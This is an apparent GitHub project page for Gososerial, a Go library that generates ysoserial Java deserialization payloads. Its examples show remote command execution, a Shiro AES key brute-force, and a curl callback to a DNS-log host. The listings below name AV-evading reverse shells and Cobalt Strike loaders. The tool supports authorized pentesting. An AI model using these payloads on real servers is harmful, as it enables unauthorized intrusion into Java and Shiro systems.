Dynamically Generates Ysoserial's Payload by Golang

Gososerial

介绍

  • ysoserial是java反序列化安全方面著名的工具

  • 无需java环境,无需下载ysoserial.jar文件

  • 输入命令直接获得payload,方便编写安全工具

  • 目前已支持CC1-CC7,K1-K4和CB1链

Introduce

  • Ysoserial is a well-known tool for Java deserialization security

  • No Java environment and no need to download ysoserial.jar file

  • Enter the command to directly obtain the payload, which is convenient for writing security tools

  • Support CommonsCollections1-7,K1-K4,CommonsBeanutils1 Now

Example

CommonsCollections1 Payload

List of Supported

Quick Start

go get github.com/EmYiQing/Gososerial
package main

import gososerial "github.com/EmYiQing/Gososerial"

func main()  {
	payload := gososerial.GetCC1("calc.exe")
	......
	sendPayload(payload)
	......
}

Example

func main() {
	// Shiro Scan Code
	target := "http://shiro_ip/"
	// Brust Shiro AES Key 
	key := shiro.CheckShiroKey(target)
	if key != "" {
		log.Info("find key: %s", key)
	}
	// Use CommonsCollections5 Payload
	var payload []byte
	payload = gososerial.GetCC5("curl xxxxx.ceye.io")
	// Send Cookies Encrypted By AES
	shiro.SendPayload(key, payload, target)
	// Receive Results Using Dnslog API
	if ceye.CheckResult("your_ceye_token") {
		log.Info("find shiro!")
	}
}

About

参考了xray中p师傅的代码

ysoserial: https://github.com/frohoff/ysoserial

xray: https://github.com/chaitin/xray

phith0n: https://github.com/phith0n

免责申明

未经授权许可使用Gososerial攻击目标是非法的

本程序应仅用于授权的安全测试与研究目的。

Owner
4ra1n
Web Security Researcher / Student of NCEPU
4ra1n
https://github.com/EmYiQing/Gososerial
Similar Resources

A k-mer serialization package for Golang

A k-mer serialization package for Golang

.uniq v5 This package provides k-mer serialization methods for the package kmers, TaxIds of k-mers are optionally saved, while there's no frequency in

Aug 19, 2022

Some Golang types based on builtin. Implements interfaces Value / Scan and MarshalJSON / UnmarshalJSON for simple working with database NULL-values and Base64 encoding / decoding.

gotypes Some simple types based on builtin Golang types that implement interfaces for working with DB (Scan / Value) and JSON (Marshal / Unmarshal). N

Feb 12, 2022

gogoprotobuf is a fork of golang/protobuf with extra code generation features.

GoGo Protobuf looking for new ownership Protocol Buffers for Go with Gadgets gogoprotobuf is a fork of golang/protobuf with extra code generation feat

Nov 26, 2021

generic sort for slices in golang

slices generic sort for slices in golang basic API func BinarySearch[E constraints.Ordered](list []E, x E) int func IsSorted[E constraints.Ordered](li

Nov 3, 2022

Bitbank-trezor - Bitbank trezor with golang

Bitbank - Trezor (c) 2022 Bernd Fix [email protected] Y bitbank-trezor is fre

Jan 27, 2022

Gofrette is a reverse shell payload developed in Golang that bypasses Windows defender and many others anti-virus.

Gofrette is a reverse shell payload developed in Golang that bypasses Windows defender and many others anti-virus.

Gofrette Gofrette is a reverse shell payload developed in Golang that bypasses Windows defender and many others anti-virus.

Dec 14, 2022

ScareCrow - Payload creation framework designed around EDR bypass.

ScareCrow - Payload creation framework designed around EDR bypass.

ScareCrow More Information If you want to learn more about the techniques utlized in this framework please take a look at Part 1 and Part 2 Descriptio

Dec 30, 2022

Another Go shellcode loader designed to work with Cobalt Strike raw binary payload.

Another Go shellcode loader designed to work with Cobalt Strike raw binary payload.

Bankai Another Go shellcode loader designed to work with Cobalt Strike raw binary payload. I created this project to mainly educate myself learning Go

Dec 29, 2022

Payload is a simple tool for working with production data in your local environment.

Payload Payload is a simple tool for working with production data in your local environment. What problem does it solve? You're working with Cloud SQL

Oct 13, 2021

generate protobuf for asynq payload.

protoc-gen-go-asynq generate protobuf for asynq payload. usage 1. install protoc-gen-go-asynq # first install protobuf, then install go get -d google.

Dec 22, 2021

Help fuzz various protocols and waits for ping backs Integrates LDAP server and JNDI payload

l9fuzz Fuzzes various protocols with JNDI LDAP payloads and listen for ping backs Features Low CPU/Memory footprint Integrated LDAP server Trace orign

Jan 13, 2022

Google-pay-decryptor - Google Pay payload decryptor Tool

Google Pay Decryptor Tool Tired of looking for information about cryptography an

Mar 20, 2022

Easily and dynamically generate maps from Go static structures

structomap This package helps you to transform your struct into map easily. It provides a structomap.Serializer interface implemented by the structoma

Dec 9, 2022

a dynamically typed, garbage collected, embeddable programming language built with Go

The agora programming language Agora is a dynamically typed, garbage collected, embeddable programming language. It is built with the Go programming l

Dec 30, 2022

A kubernetes plugin which enables dynamically add or remove GPU resources for a running Pod

A kubernetes plugin which enables dynamically add or remove GPU resources for a running Pod

GPU Mounter GPU Mounter is a kubernetes plugin which enables add or remove GPU resources for running Pods. This Introduction(In Chinese) is recommende

Jan 5, 2023

Dynamically generated Last.fm stats for your profile readme

GitHub Readme Last.fm Stats Dynamically generated last.fm stats in your profile readme Contents Usage Options Demo Development & Deployment Issues, Re

Oct 12, 2022

LazySSH is an SSH server that acts as a jump host only, and dynamically starts temporary virtual machines.

LazySSH is an SSH server that acts as a jump host only, and dynamically starts temporary virtual machines. If you find yourself briefly starti

Dec 11, 2022

System resource usage profiler tool which regularly takes snapshots of the memory and CPU load of one or more running processes so as to dynamically build up a profile of their usage of system resources.

System resource usage profiler tool which regularly takes snapshots of the memory and CPU load of one or more running processes so as to dynamically build up a profile of their usage of system resources.

Vegeta is a system resource usage tracking tool built to regularly take snapshots of the memory and CPU load of one or more running processes, so as to dynamically build up a profile of their usage of system resources.

Jan 16, 2022

Dynamically update DNS records with your interface's public IPs

Dynamically update DNS records with your interface's public IPs

Jul 2, 2022
Related tags
Serialization deserialization gadget vulnerability pentesting java-deserialization ysoserial pentesting-tools
Asn.1 BER and DER encoding library for golang.

WARNING This repo has been archived! NO further developement will be made in the foreseen future. asn1 -- import "github.com/PromonLogicalis/asn1" Pac

Nov 14, 2022
auto-generate capnproto schema from your golang source files. Depends on go-capnproto-1.0 at https://github.com/glycerine/go-capnproto

bambam: auto-generate capnproto schema from your golang source files. Adding capnproto serialization to an existing Go project used to mean writing a

Sep 27, 2022
Golang binary decoder for mapping data into the structure

binstruct Golang binary decoder to structure Install go get -u github.com/ghostiam/binstruct Examples ZIP decoder PNG decoder Use For struct From file

Dec 17, 2022
CBOR RFC 7049 (Go/Golang) - safe & fast with standard API + toarray & keyasint, CBOR tags, float64/32/16, fuzz tested.
 CBOR RFC 7049 (Go/Golang) - safe & fast with standard API + toarray & keyasint, CBOR tags, float64/32/16, fuzz tested.

CBOR library in Go fxamacker/cbor is a CBOR encoder & decoder in Go. It has a standard API, CBOR tags, options for duplicate map keys, float64→32→16,

Jan 6, 2023
csvutil provides fast and idiomatic mapping between CSV and Go (golang) values.
 csvutil provides fast and idiomatic mapping between CSV and Go (golang) values.

csvutil Package csvutil provides fast and idiomatic mapping between CSV and Go (golang) values. This package does not provide a CSV parser itself, it

Jan 6, 2023
Fixed width file parser (encoder/decoder) in GO (golang)

Fixed width file parser (encoder/decoder) for GO (golang) This library is using to parse fixed-width table data like: Name Address

Sep 27, 2022
Fast implementation of base58 encoding on golang.

Fast Implementation of Base58 encoding Fast implementation of base58 encoding in Go. Base algorithm is adapted from https://github.com/trezor/trezor-c

Dec 9, 2022
msgpack.org[Go] MessagePack encoding for Golang

MessagePack encoding for Golang ❤️ Uptrace.dev - All-in-one tool to optimize performance and monitor errors & logs Join Discord to ask questions. Docu

Dec 28, 2022
Encode and decode Go (golang) struct types via protocol buffers.

protostructure protostructure is a Go library for encoding and decoding a struct type over the wire. This library is useful when you want to send arbi

Nov 15, 2022
golang struct 或其他对象向 []byte 的序列化或反序列化

bytecodec 字节流编解码 这个库实现 struct 或其他对象向 []byte 的序列化或反序列化 可以帮助你在编写 tcp 服务,或者需要操作字节流时,简化数据的组包、解包 这个库的组织逻辑 copy 借鉴了标准库 encoding/json ?? 安装 使用 go get 安装最新版本

Jun 30, 2022